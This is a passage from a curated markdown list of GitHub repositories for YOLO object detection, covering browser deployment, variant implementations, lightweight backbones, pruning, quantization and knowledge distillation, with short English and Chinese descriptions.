yolo. - [nihui/ncnn-webassembly-yolov5](https://github.com/nihui/ncnn-webassembly-yolov5) <img src="https://img.shields.io/github/stars/nihui/ncnn-webassembly-yolov5?style=social"/> : Deploy YOLOv5 in your web browser with ncnn and webassembly. - [muhk01/Yolov5-on-Flask](https://github.com/muhk01/Yolov5-on-Flask) <img src="https://img.shields.io/github/stars/muhk01/Yolov5-on-Flask?style=social"/> : Running YOLOv5 through web browser using Flask microframework. - [tcyfree/yolov5](https://github.com/tcyfree/yolov5) <img src="https://img.shields.io/github/stars/tcyfree/yolov5?style=social"/> : ๅŸบไบŽFlaskๅผ€ๅ‘ๅŽ็ซฏใ€VUEๅผ€ๅ‘ๅ‰็ซฏๆก†ๆžถ๏ผŒๅœจWEB็ซฏ้ƒจ็ฝฒYOLOv5็›ฎๆ ‡ๆฃ€ๆต‹ๆจกๅž‹ใ€‚ - [siffyy/YOLOv5-Web-App-for-Vehicle-Detection](https://github.com/siffyy/YOLOv5-Web-App-for-Vehicle-Detection) <img src="https://img.shields.io/github/stars/siffyy/YOLOv5-Web-App-for-Vehicle-Detection?style=social"/> : Repo for Web Application for Vehicle detection from Satellite Imagery using YOLOv5 model. - [Devmawi/BlazorObjectDetection-Sample](https://github.com/Devmawi/BlazorObjectDetection-Sample) <img src="https://img.shields.io/github/stars/Devmawi/BlazorObjectDetection-Sample?style=social"/> : A sample for demonstrating online execution of an onnx model by a Blazor app. - [Hyuto/yolov5-onnxruntime-web](https://github.com/Hyuto/yolov5-onnxruntime-web) <img src="https://img.shields.io/github/stars/Hyuto/yolov5-onnxruntime-web?style=social"/> : YOLOv5 right in your browser with onnxruntime-web. - ### Others - [jinfagang/yolov7_d2](https://github.com/jinfagang/yolov7_d2) <img src="https://img.shields.io/github/stars/jinfagang/yolov7_d2?style=social"/> : ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ (Earlier YOLOv7 not official one) YOLO with Transformers and Instance Segmentation, with TensorRT acceleration! ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ - [yang-0201/YOLOv6_pro](https://github.com/yang-0201/YOLOv6_pro) <img src="https://img.shields.io/github/stars/yang-0201/YOLOv6_pro?style=social"/> : Make it easier for yolov6 to change the network structure. - [j-marple-dev/AYolov2](https://github.com/j-marple-dev/AYolov2) <img src="https://img.shields.io/github/stars/j-marple-dev/AYolov2?style=social"/> : The main goal of this repository is to rewrite the object detection pipeline with a better code structure for better portability and adaptability to apply new experimental methods. The object detection pipeline is based on [Ultralytics YOLOv5](https://github.com/ultralytics/yolov5). - [fcakyon/yolov5-pip](https://github.com/fcakyon/yolov5-pip) <img src="https://img.shields.io/github/stars/fcakyon/yolov5-pip?style=social"/> : Packaged version of ultralytics/yolov5. - [kadirnar/yolov6-pip](https://github.com/kadirnar/yolov6-pip) <img src="https://img.shields.io/github/stars/kadirnar/yolov6-pip?style=social"/> : Packaged version of yolov6 model. - [kadirnar/yolov7-pip](https://github.com/kadirnar/yolov7-pip) <img src="https://img.shields.io/github/stars/kadirnar/yolov7-pip?style=social"/> : Packaged version of yolov7 model. - [kadirnar/torchyolo](https://github.com/kadirnar/torchyolo) <img src="https://img.shields.io/github/stars/kadirnar/torchyolo?style=social"/> : PyTorch implementation of YOLOv5, YOLOv6, YOLOv7, YOLOX. - [CvPytorch](https://github.com/shanglianlm0525/CvPytorch) <img src="https://img.shields.io/github/stars/shanglianlm0525/CvPytorch?style=social"/> : CvPytorch is an open source COMPUTER VISION toolbox based on PyTorch. - [Holocron](https://github.com/frgfm/Holocron) <img src="https://img.shields.io/github/stars/frgfm/Holocron?style=social"/> : PyTorch implementations of recent Computer Vision tricks (ReXNet, RepVGG, Unet3p, YOLOv4, CIoU loss, AdaBelief, PolyLoss). - [DL-Practise/YoloAll](https://github.com/DL-Practise/YoloAll) <img src="https://img.shields.io/github/stars/DL-Practise/YoloAll?style=social"/> : YoloAll is a collection of yolo all versions. you you use YoloAll to test yolov3/yolov5/yolox/yolo_fastest. - [msnh2012/Msnhnet](https://github.com/msnh2012/Msnhnet) <img src="https://img.shields.io/github/stars/msnh2012/Msnhnet?style=social"/> : (yolov3 yolov4 yolov5 unet ...)A mini pytorch inference framework which inspired from darknet. - [xinghanliuying/yolov5-trick](https://github.com/xinghanliuying/yolov5-trick) <img src="https://img.shields.io/github/stars/xinghanliuying/yolov5-trick?style=social"/> : ๅŸบไบŽyolov5็š„ๆ”น่ฟ›ๅบ“ใ€‚ - [BMW-InnovationLab/BMW-YOLOv4-Training-Automation](https://github.com/BMW-InnovationLab/BMW-YOLOv4-Training-Automation) <img src="https://img.shields.io/github/stars/BMW-InnovationLab/BMW-YOLOv4-Training-Automation?style=social"/> : YOLOv4-v3 Training Automation API for Linux. - [AntonMu/TrainYourOwnYOLO](https://github.com/AntonMu/TrainYourOwnYOLO) <img src="https://img.shields.io/github/stars/AntonMu/TrainYourOwnYOLO?style=social"/> : Train a state-of-the-art yolov3 object detector from scratch! - [madhawav/YOLO3-4-Py](https://github.com/madhawav/YOLO3-4-Py) <img src="https://img.shields.io/github/stars/madhawav/YOLO3-4-Py?style=social"/> : A Python wrapper on Darknet. Compatible with YOLO V3. - [theAIGuysCode/yolov4-custom-functions](https://github.com/theAIGuysCode/yolov4-custom-functions) <img src="https://img.shields.io/github/stars/theAIGuysCode/yolov4-custom-functions?style=social"/> : A Wide Range of Custom Functions for YOLOv4, YOLOv4-tiny, YOLOv3, and YOLOv3-tiny Implemented in TensorFlow, TFLite, and TensorRT. - [tiquasar/FLAITER](https://github.com/tiquasar/FLAITER) <img src="https://img.shields.io/github/stars/tiquasar/FLAITER?style=social"/> : Machine Learning and AI Mobile Application. - [kadirnar/Minimal-Yolov6](https://github.com/kadirnar/Minimal-Yolov6) <img src="https://img.shields.io/github/stars/kadirnar/Minimal-Yolov6?style=social"/> : Minimal-Yolov6. - [DataXujing/YOLOv6](https://github.com/DataXujing/YOLOv6) <img src="https://img.shields.io/github/stars/DataXujing/YOLOv6?style=social"/> : ๐ŸŒ€ ๐ŸŒ€ ๆ‰‹ๆ‘ธๆ‰‹ ็พŽๅ›ข YOLOv6ๆจกๅž‹่ฎญ็ปƒๅ’ŒTensorRT็ซฏๅˆฐ็ซฏ้ƒจ็ฝฒๆ–นๆกˆๆ•™็จ‹ใ€‚ - [DataXujing/YOLOv7](https://github.com/DataXujing/YOLOv7) <img src="https://img.shields.io/github/stars/DataXujing/YOLOv7?style=social"/> : ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ Official YOLOv7่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†ๅนถๅฎž็Žฐ็ซฏๅˆฐ็ซฏ็š„TensorRTๆจกๅž‹ๅŠ ้€ŸๆŽจๆ–ญใ€‚ - [DataXujing/YOLOv8](https://github.com/DataXujing/YOLOv8) <img src="https://img.shields.io/github/stars/DataXujing/YOLOv8?style=social"/> : ๐Ÿ”ฅ Official YOLOv8ๆจกๅž‹่ฎญ็ปƒๅ’Œ้ƒจ็ฝฒใ€‚Official YOLOv8 ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†ๅนถๅŸบไบŽNVIDIA TensorRTๅ’ŒๅŽไธบๆ˜‡่…พ็ซฏๅˆฐ็ซฏๆจกๅž‹ๅŠ ้€ŸไปฅๅŠๅฎ‰ๅ“ๆ‰‹ๆœบ็ซฏ้ƒจ็ฝฒใ€‚ - [DataXujing/YOLOv9](https://github.com/DataXujing/YOLOv9) <img src="https://img.shields.io/github/stars/DataXujing/YOLOv9?style=social"/> : ๐Ÿ”ฅ YOLOv9 paper่งฃๆž๏ผŒ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎ้›†๏ผŒTensorRT็ซฏๅˆฐ็ซฏ้ƒจ็ฝฒ๏ผŒ NCNNๅฎ‰ๅ“ๆ‰‹ๆœบ้ƒจ็ฝฒใ€‚ - [Code-keys/yolov5-darknet](https://github.com/Code-keys/yolov5-darknet) <img src="https://img.shields.io/github/stars/Code-keys/yolov5-darknet?style=social"/> : yolov5-darknet support yaml && cfg. - [Code-keys/yolo-darknet](https://github.com/Code-keys/yolo-darknet) <img src="https://img.shields.io/github/stars/Code-keys/yolo-darknet?style=social"/> : YOLO-family complemented by darknet. yolov5 yolov7 et al ... - [pooya-mohammadi/deep_utils](https://github.com/pooya-mohammadi/deep_utils) <img src="https://img.shields.io/github/stars/pooya-mohammadi/deep_utils?style=social"/> : A toolkit full of handy functions including most used models and utilities for deep-learning practitioners! - [yl-jiang/YOLOSeries](https://github.com/yl-jiang/YOLOSeries) <img src="https://img.shields.io/github/stars/yl-jiang/YOLOSeries?style=social"/> : YOLO Series. - [yjh0410/FreeYOLO](https://github.com/yjh0410/FreeYOLO) <img src="https://img.shields.io/github/stars/yjh0410/FreeYOLO?style=social"/> : FreeYOLO is inspired by many other excellent works, such as YOLOv7 and YOLOX. - [open-yolo/yolov7](https://github.com/open-yolo/yolov7) <img src="https://img.shields.io/github/stars/open-yolo/yolov7?style=social"/> : Improved and packaged version of WongKinYiu/yolov7. - [iloveai8086/YOLOC](https://github.com/iloveai8086/YOLOC) <img src="https://img.shields.io/github/stars/iloveai8086/YOLOC?style=social"/> : ๐Ÿš€YOLOC is Combining different modules to build an different Object detection model. - [miemie2013/miemiedetection](https://github.com/miemie2013/miemiedetection) <img src="https://img.shields.io/github/stars/miemie2013/miemiedetection?style=social"/> : Pytorch and ncnn implementation of PPYOLOEใ€YOLOXใ€PPYOLOใ€PPYOLOv2ใ€SOLOv2 an so on. - [RyanCCC/YOLOSeries](https://github.com/RyanCCC/YOLOSeries) <img src="https://img.shields.io/github/stars/RyanCCC/YOLOSeries?style=social"/> : YOLO็ฎ—ๆณ•็š„ๅฎž็Žฐใ€‚ - [HuKai97/YOLOX-Annotations](https://github.com/HuKai97/YOLOX-Annotations) <img src="https://img.shields.io/github/stars/HuKai97/YOLOX-Annotations?style=social"/> : ไธ€ไธชYOLOX็š„ไธญๆ–‡ๆณจ้‡Š็‰ˆๆœฌ๏ผŒไพ›ๅคงๅฎถๅ‚่€ƒๅญฆไน ๏ผ - [isLinXu/YOLOv8_Efficient](https://github.com/isLinXu/YOLOv8_Efficient) <img src="https://img.shields.io/github/stars/isLinXu/YOLOv8_Efficient?style=social"/> : ๐Ÿš€Simple and efficient use for Ultralytics yolov8๐Ÿš€ - [z1069614715/objectdetection_script](https://github.com/z1069614715/objectdetection_script) <img src="https://img.shields.io/github/stars/z1069614715/objectdetection_script?style=social"/> : ไธ€ไบ›ๅ…ณไบŽ็›ฎๆ ‡ๆฃ€ๆต‹็š„่„šๆœฌ็š„ๆ”น่ฟ›ๆ€่ทฏไปฃ็ ใ€‚ ## Lighter and Deployment Frameworks - ### Lightweight Backbones and FPN #### ่ฝป้‡็บง้ชจๅนฒ็ฝ‘็ปœๅ’Œ็‰นๅพ้‡‘ๅญ—ๅก”็ฝ‘็ปœ - [murufeng/awesome_lightweight_networks](https://github.com/murufeng/awesome_lightweight_networks) <img src="https://img.shields.io/github/stars/murufeng/awesome_lightweight_networks?style=social"/> : The implementation of various lightweight networks by using PyTorch. such as๏ผšMobileNetV2๏ผŒMobileNeXt๏ผŒGhostNet๏ผŒParNet๏ผŒMobileViTใ€AdderNet๏ผŒShuffleNetV1-V2๏ผŒLCNet๏ผŒConvNeXt๏ผŒetc. โญโญโญโญโญ - [Bobo-y/flexible-yolov5](https://github.com/Bobo-y/flexible-yolov5) <img src="https://img.shields.io/github/stars/Bobo-y/flexible-yolov5?style=social"/> : More readable and flexible yolov5 with more backbone(resnet, shufflenet, moblienet, efficientnet, hrnet, swin-transformer) and (cbam๏ผŒdcn and so on), and tensorrt. - [XingZeng307/YOLOv5_with_BiFPN](https://github.com/XingZeng307/YOLOv5_with_BiFPN) <img src="https://img.shields.io/github/stars/XingZeng307/YOLOv5_with_BiFPN?style=social"/> : This repo is mainly for replacing PANet with BiFPN in YOLOv5. - [dog-qiuqiu/MobileNet-Yolo](https://github.com/dog-qiuqiu/MobileNet-Yolo) <img src="https://img.shields.io/github/stars/dog-qiuqiu/MobileNet-Yolo?style=social"/> : MobileNetV2-YoloV3-Nano: 0.5BFlops 3MB HUAWEI P40: 6ms/img, YoloFace-500k:0.1Bflops 420KB๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ. - [eric612/MobileNet-YOLO](https://github.com/eric612/MobileNet-YOLO) <img src="https://img.shields.io/github/stars/eric612/MobileNet-YOLO?style=social"/> : A caffe implementation of MobileNet-YOLO detection network. - [eric612/Mobilenet-YOLO-Pytorch](https://github.com/eric612/Mobilenet-YOLO-Pytorch) <img src="https://img.shields.io/github/stars/eric612/Mobilenet-YOLO-Pytorch?style=social"/> : Include mobilenet series (v1,v2,v3...) and yolo series (yolov3,yolov4,...) . - [Adamdad/keras-YOLOv3-mobilenet](https://github.com/Adamdad/keras-YOLOv3-mobilenet) <img src="https://img.shields.io/github/stars/Adamdad/keras-YOLOv3-mobilenet?style=social"/> : A Keras implementation of YOLOv3 (Tensorflow backend) inspired by [allanzelener/YAD2K](https://github.com/allanzelener/YAD2K). - [fsx950223/mobilenetv2-yolov3](https://github.com/fsx950223/mobilenetv2-yolov3) <img src="https://img.shields.io/github/stars/fsx950223/mobilenetv2-yolov3?style=social"/> : yolov3 with mobilenetv2 and efficientnet. - [liux0614/yolo_nano](https://github.com/liux0614/yolo_nano) <img src="https://img.shields.io/github/stars/liux0614/yolo_nano?style=social"/> : Unofficial implementation of yolo nano. - [lingtengqiu/Yolo_Nano](https://github.com/lingtengqiu/Yolo_Nano) <img src="https://img.shields.io/github/stars/lingtengqiu/Yolo_Nano?style=social"/> : Pytorch implementation of yolo_Nano for pedestrian detection. - [bubbliiiing/mobilenet-yolov4-pytorch](https://github.com/bubbliiiing/mobilenet-yolov4-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/mobilenet-yolov4-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชmobilenet-yolov4็š„ๅบ“๏ผŒๆŠŠyolov4ไธปๅนฒ็ฝ‘็ปœไฟฎๆ”นๆˆไบ†mobilenet๏ผŒไฟฎๆ”นไบ†Panet็š„ๅท็งฏ็ป„ๆˆ๏ผŒไฝฟๅ‚ๆ•ฐ้‡ๅคงๅน…ๅบฆ็ผฉๅฐใ€‚ - [bubbliiiing/efficientnet-yolo3-pytorch](https://github.com/bubbliiiing/efficientnet-yolo3-pytorch) <img src="https://img.shields.io/github/stars/bubbliiiing/efficientnet-yolo3-pytorch?style=social"/> : ่ฟ™ๆ˜ฏไธ€ไธชefficientnet-yolo3-pytorch็š„ๆบ็ ๏ผŒๅฐ†yolov3็š„ไธปๅนฒ็‰นๅพๆๅ–็ฝ‘็ปœไฟฎๆ”นๆˆไบ†efficientnetใ€‚ - [HuKai97/YOLOv5-ShuffleNetv2](https://github.com/HuKai97/YOLOv5-ShuffleNetv2) <img src="https://img.shields.io/github/stars/HuKai97/YOLOv5-ShuffleNetv2?style=social"/> : YOLOv5็š„่ฝป้‡ๅŒ–ๆ”น่ฟ›(่œ‚ๅทขๆฃ€ๆต‹้กน็›ฎ)ใ€‚ - [YOLO-ReT](https://github.com/guotao0628/yoloret) <img src="https://img.shields.io/github/stars/guotao0628/yoloret?style=social"/> : "YOLO-ReT: Towards High Accuracy Real-time Object Detection on Edge GPUs". (**[WACV 2022](https://openaccess.thecvf.com/content/WACV2022/html/Ganesh_YOLO-ReT_Towards_High_Accuracy_Real-Time_Object_Detection_on_Edge_GPUs_WACV_2022_paper.html)**) - ### Pruning Knoweldge-Distillation Quantization - ##### Pruning ###### ๅ‰ชๆž - [Torch-Pruning](https://github.com/VainF/Torch-Pruning) <img src="https://img.shields.io/github/stars/VainF/Torch-Pruning?style=social"/> : Towards Any Structural Pruning; LLMs / SAM / Diffusion / Transformers / YOLOv8 / CNNs. "Towards Any Structural Pruning". (**[CVPR 2023](https://openaccess.thecvf.com/content/CVPR2023/html/Fang_DepGraph_Towards_Any_Structural_Pruning_CVPR_2023_paper.html)**) - [SparseML](https://github.com/neuralmagic/sparseml) <img src="https://img.shields.io/github/stars/neuralmagic/sparseml?style=social"/> : Libraries for applying sparsification recipes to neural networks with a few lines of code, enabling faster and smaller models. "Inducing and Exploiting Activation Sparsity for Fast Inference on Deep Neural Networks". (**[PMLR 2020](http://proceedings.mlr.press/v119/kurtz20a.html)**). "Woodfisher: Efficient second-order approximation for neural network compression". (**[NeurIPS 2020](https://proceedings.neurips.cc/paper/2020/hash/d1ff1ec86b62cd5f3903ff19c3a326b2-Abstract.html)**) - [SparseZoo](https://github.com/neuralmagic/sparsezoo) <img src="https://img.shields.io/github/stars/neuralmagic/sparsezoo?style=social"/> : Neural network model repository for highly sparse and sparse-quantized models with matching sparsification recipes. - [Gumpest/YOLOv5-Multibackbone-Compression](https://github.com/Gumpest/YOLOv5-Multibackbone-Compression) <img src="https://img.shields.io/github/stars/Gumpest/YOLOv5-Multibackbone-Compression?style=social"/> : YOLOv5 Series Multi-backbone(TPH-YOLOv5, Ghostnet, ShuffleNetv2, Mobilenetv3Small, EfficientNetLite, PP-LCNet, SwinTransformer YOLO), Module(CBAM, DCN), Pruning (EagleEye, Network Slimming) and Quantization (MQBench) Compression Tool Box. - [SlimYOLOv3](https://github.com/PengyiZhang/SlimYOLOv3) <img src="https://img.shields.io/github/stars/PengyiZhang/SlimYOLOv3?style=social"/> : "SlimYOLOv3: Narrower, Faster and Better for UAV Real-Time Applications". (**[arXiv 2019](https://arxiv.org/abs/1907.11093)**) - [uyzhang/yolov5_prune](https://github.com/uyzhang/yolov5_prune) <img src="https://img.shields.io/github/stars/uyzhang/yolov5_prune?style=social"/> : Yolov5 pruning on COCO Dataset. - [midasklr/yolov5prune](https://github.com/midasklr/yolov5prune) <img src="https://img.shields.io/github/stars/midasklr/yolov5prune?style=social"/> : yolov5ๆจกๅž‹ๅ‰ชๆžใ€‚ - [ZJU-lishuang/yolov5_prune](https://github.com/ZJU-lishuang/yolov5_prune) <img src="https://img.shields.io/github/stars/ZJU-lishuang/yolov5_prune?style=social"/> : yolov5 prune๏ผŒSupport V2, V3, V4 and V6 versions of yolov5. - [sbbug/yolov5-prune-multi](https://github.com/sbbug/yolov5-prune-multi) <img src="https://img.shields.io/github/stars/sbbug/yolov5-prune-multi?style=social"/> : yolov5-prune-multi ๆ— ไบบๆœบ่ง†่ง’ใ€ๅคšๆจกๆ€ใ€ๆจกๅž‹ๅ‰ชๆžใ€ๅ›ฝไบงAI่Šฏ็‰‡้ƒจ็ฝฒใ€‚ - [Syencil/mobile-yolov5-pruning-distillation](https://github.com/Syencil/mobile-yolov5-pruning-distillation) <img src="https://img.shields.io/github/stars/Syencil/mobile-yolov5-pruning-distillation?style=social"/> : mobilev2-yolov5sๅ‰ชๆžใ€่’ธ้ฆ๏ผŒๆ”ฏๆŒncnn๏ผŒtensorRT้ƒจ็ฝฒใ€‚ultra-light but better performence๏ผ - [Lam1360/YOLOv3-model-pruning](https://github.com/Lam1360/YOLOv3-model-pruning) <img src="https://img.shields.io/github/stars/Lam1360/YOLOv3-model-pruning?style=social"/> : ๅœจ oxford hand ๆ•ฐๆฎ้›†ไธŠๅฏน YOLOv3 ๅšๆจกๅž‹ๅ‰ชๆž๏ผˆnetwork slimming๏ผ‰ใ€‚ - [tanluren/yolov3-channel-and-layer-pruning](https://github.com/tanluren/yolov3-channel-and-layer-pruning) <img src="https://img.shields.io/github/stars/tanluren/yolov3-channel-and-layer-pruning?style=social"/> : yolov3 yolov4 channel and layer pruning, Knowledge Distillation ๅฑ‚ๅ‰ชๆž๏ผŒ้€š้“ๅ‰ชๆž๏ผŒ็Ÿฅ่ฏ†่’ธ้ฆใ€‚ - [coldlarry/YOLOv3-complete-pruning](https://github.com/coldlarry/YOLOv3-complete-pruning) <img src="https://img.shields.io/github/stars/coldlarry/YOLOv3-complete-pruning?style=social"/> : ๆไพ›ๅฏนYOLOv3ๅŠTiny็š„ๅคš็งๅ‰ชๆž็‰ˆๆœฌ๏ผŒไปฅ้€‚ๅบ”ไธๅŒ็š„้œ€ๆฑ‚ใ€‚ - [SpursLipu/YOLOv3v4-ModelCompression-MultidatasetTraining-Multibackbone](https://github.com/SpursLipu/YOLOv3v4-ModelCompression-MultidatasetTraining-Multibackbone) <img src="https://img.shields.io/github/stars/SpursLipu/YOLOv3v4-ModelCompression-MultidatasetTraining-Multibackbone?style=social"/> : YOLO ModelCompression MultidatasetTraining. - [talebolano/yolov3-network-slimming](https://github.com/talebolano/yolov3-network-slimming) <img src="https://img.shields.io/github/stars/talebolano/yolov3-network-slimming?style=social"/> : yolov3 network slimmingๅ‰ชๆž็š„ไธ€็งๅฎž็Žฐใ€‚ - [Bigtuo/YOLOX-Lite](https://github.com/Bigtuo/YOLOX-Lite) <img src="https://img.shields.io/github/stars/Bigtuo/YOLOX-Lite?style=social"/> : ๅฐ†YOLOv5-Liteไปฃ็ ไธญ็š„headๆ›ดๆขไธบYOLOX headใ€‚ - [YINYIPENG-EN/Pruning_for_YOLOV5_pytorch](https://github.com/YINYIPENG-EN/Pruning_for_YOLOV5_pytorch) <img src="https://img.shields.io/github/stars/YINYIPENG-EN/Pruning_for_YOLOV5_pytorch?style=social"/> : Pruning_for_YOLOV5_pytorch. - [chumingqian/Model_Compression_For_YOLOV3-V4](https://github.com/chumingqian/Model_Compression_For_YOLOV3-V4) <img src="https://img.shields.io/github/stars/chumingqian/Model_Compression_For_YOLOV3-V4?style=social"/> : In this repository using the dynamic sparse training( variable sparse rate s which can speed up the sparse training process), channel pruning and knowledge distilling for YOLOV3 and YOLOV4. - [xhwNobody/yolov5_prune_sfp](https://github.com/xhwNobody/yolov5_prune_sfp) <img src="https://img.shields.io/github/stars/xhwNobody/yolov5_prune_sfp?style=social"/> : ๅŸบไบŽSFPๅ’ŒFPGM็š„yolov5็š„่ฝฏๅ‰ชๆžๅฎž็Žฐใ€‚ - ##### Quantization ###### ้‡ๅŒ– - [dog-qiuqiu/FastestDet](https://github.com/dog-qiuqiu/FastestDet) <img src="https://img.shields.io/github/stars/dog-qiuqiu/FastestDet?style=social"/> : โšก A newly designed ultra lightweight anchor free target detection algorithm๏ผŒ weight only 250K parameters๏ผŒ reduces the time consumption by 10% compared with yolo-fastest, and the post-processing is simpler. "็ŸฅไนŽใ€Œ้ฉฌ้›ชๆตฉใ€ใ€Š[FastestDet: ๆฏ”yolo-fastestๆ›ดๅฟซ๏ผๆ›ดๅผบ๏ผๆ›ด็ฎ€ๅ•๏ผๅ…จๆ–ฐ่ฎพ่ฎก็š„่ถ…ๅฎžๆ—ถAnchor-free็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://zhuanlan.zhihu.com/p/536500269)ใ€‹"ใ€‚ "ๅพฎไฟกๅ…ฌไผ—ๅทใ€Œ่ฎก็ฎ—ๆœบ่ง†่ง‰็ ”็ฉถ้™ขใ€ใ€Š[FastestDet๏ผšๆฏ”yolov5ๆ›ดๅฟซ๏ผๆ›ดๅผบ๏ผๅ…จๆ–ฐ่ฎพ่ฎก็š„่ถ…ๅฎžๆ—ถAnchor-free็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•๏ผˆ้™„ๆบไปฃ็ ไธ‹่ฝฝ๏ผ‰](https://mp.weixin.qq.com/s/Bskc5WQd8ujy16Jl4qekjQ)ใ€‹"ใ€‚ - [dog-qiuqiu/Yolo-Fastest](https://github.com/dog-qiuqiu/Yolo-Fastest) <img src="https://img.shields.io/github/stars/dog-qiuqiu/Yolo-Fastest?style=social"/> : Yolo-Fastest๏ผš่ถ…่ถ…่ถ…ๅฟซ็š„ๅผ€ๆบARMๅฎžๆ—ถ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•ใ€‚ [Zenodo 2021](http://doi.org/10.5281/zenodo.5131532). "็ŸฅไนŽใ€Œ้ฉฌ้›ชๆตฉใ€ใ€Š[Yolo-Fastest๏ผš่ถ…่ถ…่ถ…ๅฟซ็š„ๅผ€ๆบARMๅฎžๆ—ถ็›ฎๆ ‡ๆฃ€ๆต‹็ฎ—ๆณ•](https://zhuanlan.zhihu.com/p/234506503)ใ€‹"ใ€‚ - [dog-qiuqiu/Yolo-FastestV2](https://github.com/dog-qiuqiu/Yolo-FastestV2) <img src="https://img.shields.io/github/stars/dog-qiuqiu/Yolo-FastestV2?style=social"/> : Yolo-FastestV2:ๆ›ดๅฟซ๏ผŒๆ›ด่ฝป๏ผŒ็งปๅŠจ็ซฏๅฏ่พพ300FPS๏ผŒๅ‚ๆ•ฐ้‡ไป…250kใ€‚ "็ŸฅไนŽใ€Œ้ฉฌ้›ชๆตฉใ€ใ€Š[Yolo-FastestV2:ๆ›ดๅฟซ๏ผŒๆ›ด่ฝป๏ผŒ็งปๅŠจ็ซฏๅฏ่พพ300FPS๏ผŒๅ‚ๆ•ฐ้‡ไป…250k](https://zhuanlan.zhihu.com/p/400474142)ใ€‹"ใ€‚ - [YOLObile](https://github.com/nightsnack/YOLObile) <img src="https://img.shields.io/github/stars/nightsnack/YOLObile?style=social"/> : "YOLObile: Real-Time Object Detection on Mobile Devices via Compression-Compilation Co-Design". (**[AAAI 2021](https://www.aaai.org/AAAI21Papers/AAAI-7561.CaiY.pdf)**) - [PaddleSlim](https://github.com/PaddlePaddle/PaddleSlim) <img src="https://img.shields.io/github/stars/PaddlePaddle/PaddleSlim?style=social"/> : PaddleSlim is an open-source library for deep model compression and architecture search. PaddleSlimๆ˜ฏไธ€ไธชไธ“ๆณจไบŽๆทฑๅบฆๅญฆไน ๆจกๅž‹ๅŽ‹็ผฉ็š„ๅทฅๅ…ทๅบ“๏ผŒๆไพ›ไฝŽๆฏ”็‰น้‡ๅŒ–ใ€็Ÿฅ่ฏ†่’ธ้ฆใ€็จ€็–ๅŒ–ๅ’Œๆจกๅž‹็ป“ๆž„ๆœ็ดข็ญ‰ๆจกๅž‹ๅŽ‹็ผฉ็ญ–็•ฅ๏ผŒๅธฎๅŠฉ็”จๆˆทๅฟซ้€Ÿๅฎž็Žฐๆจกๅž‹็š„ๅฐๅž‹ๅŒ–ใ€‚ - [PPL้‡ๅŒ–ๅทฅๅ…ท](https://github.com/openppl-public/ppq) <img src="https://img.shields.io/github/stars/openppl-public/ppq?style=social"/> : PPL Quantization Tool (PPQ) is a powerful offline neural network quantization tool. PPL QuantTool ๆ˜ฏไธ€ไธช้ซ˜ๆ•ˆ็š„ๅทฅไธš็บง็ฅž็ป็ฝ‘็ปœ้‡ๅŒ–ๅทฅๅ…ทใ€‚ - [PINTO_model_zoo](https://github.com/PINTO0309/PINTO_model_zoo) <img src="https://img.shields.io/github/stars/PINTO0309/PINTO_model_zoo?style=social"/> : A repository for storing models that have been inter-converted between various frameworks. Supported frameworks are TensorFlow, PyTorch, ONNX, OpenVINO, TFJS, TFTRT, TensorFlowLite (Float32/16/INT8), EdgeTPU, CoreML. - [ppogg/YOLOv5-Lite](https://github.com/ppogg/YOLOv5-Lite) <img src="https://img.shields.io/github/stars/ppogg/YOLOv5-Lite?style=social"/> : ๐Ÿ…๐Ÿ…๐Ÿ…YOLOv5-Lite: lighter, faster and easier to deploy. Evolved from yolov5 and the size of model is only 930+kb (int8) and 1.7M (fp16). It can reach 10+ FPS on the Raspberry Pi 4B when the input size is 320ร—320~ - [AlexeyAB/yolo2_light](https://github.com/AlexeyAB/yolo2_light) <img src="https://img.shields.io/github/stars/AlexeyAB/yolo2_light?style=social"/> : Light version of convolutional neural network Yolo v3 & v2 for objects detection with a minimum of dependencies (INT8-inference, BIT1-XNOR-inference). - ##### Knoweldge-Distillation ###### ็Ÿฅ่ฏ†่’ธ้ฆ - [torchdistill](https://github.com/yoshitomo-matsubara/torchdistill) <img src="https://img.shields.io/github/stars/yoshitomo-matsubara/torchdistill?style=social"/> : torchdistill: A Modular, Configuration-Driven Framework for Knowledge Distillation. A coding-free framework built on PyTorch for reproducible deep learning studies. ๐Ÿ†20 knowledge distillation methods presented at CVPR, ICLR, ECCV, NeurIPS, ICCV, etc are implemented so far. ๐ŸŽ Trained models, training logs and configurations are available for ensuring the reproducibiliy and benchmark. - [wonbeomjang/yolov5-knowledge-distillation](https://github.com/wonbeomjang/yolov5-knowledge-distillation) <img src="https://img.shields.io/github/stars/wonbeomjang/yolov5-knowledge-distillation?style=social"/> : implementation of [Distilling Object Detectors with Fine-grained Feature Imitation](https://github.com/twangnh/Distilling-Object-Detectors) on yolov5. "Distilling Object Detectors with Fine-grained Feature Imitation". (**[CVPR 2019](https://openaccess.thecvf.com/content_CVPR_2019/html/Wang_Distilling_Object_Detectors_With_Fine-Grained_Feature_Imitation_CVPR_2019_paper.html)**) - [Sharpiless/Yolov5-distillation-train-inference](https://github.com/Sharpiless/Yolov5-distillation-train-inference) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov5-distillation-train-inference?style=social"/> : Yolov5 distillation training | Yolov5็Ÿฅ่ฏ†่’ธ้ฆ่ฎญ็ปƒ๏ผŒๆ”ฏๆŒ่ฎญ็ปƒ่‡ชๅทฑ็š„ๆ•ฐๆฎใ€‚ - [Sharpiless/yolov5-distillation-5.0](https://github.com/Sharpiless/yolov5-distillation-5.0) <img src="https://img.shields.io/github/stars/Sharpiless/yolov5-distillation-5.0?style=social"/> : yolov5 5.0 version distillation || yolov5 5.0็‰ˆๆœฌ็Ÿฅ่ฏ†่’ธ้ฆ๏ผŒyolov5l >> yolov5sใ€‚ - [Sharpiless/yolov5-knowledge-distillation](https://github.com/Sharpiless/yolov5-knowledge-distillation) <img 